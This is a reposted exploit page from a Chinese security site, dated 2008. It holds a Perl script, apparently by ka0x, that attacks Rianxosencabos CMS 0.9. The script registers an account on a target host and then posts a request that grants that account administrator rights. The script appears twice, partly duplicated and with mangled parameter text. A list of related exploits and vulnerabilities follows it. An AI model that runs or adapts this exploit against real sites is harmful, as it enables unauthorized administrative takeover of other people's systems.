Rianxosencabos CMS 0.9 Remote Add Admin Exploit
互联网 发布时间:2008-10-08 21:02:42 作者:佚名 
我要评论
我要评论#!/usr/bin/perl -w
# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
# written by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.doml
#!/usr/bin/perl -w
# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){
print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>\n";
print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
exit 1;
} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
$req->content_type('application/x-www-form-urlencoded') ;
$req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;
my $location = $res->header('Location') ;
if ($location =~ /Usuario creado/i) {
print "[ ] user added: ".$login ;
print "\n[ ] password: ".$pass, "\n" ;
} else{
print "[-] Exploit Failed!\n" ;
}
} &__CREATE ; sub __ADMIN {
my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;
} &__ADMIN ;
__END__
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){
print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>\n";
print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
exit 1;
} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
$req->content_type('application/x-www-form-urlencoded') ;
$req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;
my $location = $res->header('Location') ;
if ($location =~ /Usuario creado/i) {
print "[ ] user added: ".$login ;
print "\n[ ] password: ".$pass, "\n" ;
} else{
print "[-] Exploit Failed!\n" ;
}
} &__CREATE ; sub __ADMIN {
my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;
} &__ADMIN ;
__END__
相关文章
- 昨晚跟@Sunshine 请教了下终端机的玩法,顺便翻了翻资料。总结了以下的几种方法2013-06-19
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== =============2008-10-08File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection | |________________________________________| Download from: http://upoint.info/cgi/demo/fs/filestore.zip2008-10-08Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerabi
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ######2008-10-08DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #================================2008-10-08gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulner2008-10-08phpDatingClub (website.php page) Local File Inclusion Vulnerabilit
######################################################### # # phpDatingClub Local File Include Vulnerability #=====================================2008-10-08Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Expl
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript2008-10-08Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[2008-10-08IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be2008-10-08
最新评论